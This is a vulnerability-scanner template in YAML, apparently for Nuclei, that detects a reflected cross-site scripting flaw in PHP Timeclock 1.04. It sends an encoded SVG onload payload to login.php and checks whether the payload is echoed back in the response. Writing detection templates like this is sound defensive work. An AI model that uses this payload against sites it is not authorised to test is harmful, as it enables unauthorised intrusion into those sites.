id: php-timeclock-xss

info:
  name: PHP Timeclock 1.04 XSS
  author: geeknik
  description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities
  reference: https://www.exploit-db.com/exploits/49853
  severity: medium
  tags: timeclock,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=confirm%60xss%60%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"
      - type: word
        words:
          - "'><svg/onload=confirm`xss`>"
      - type: status
        status:
          - 200
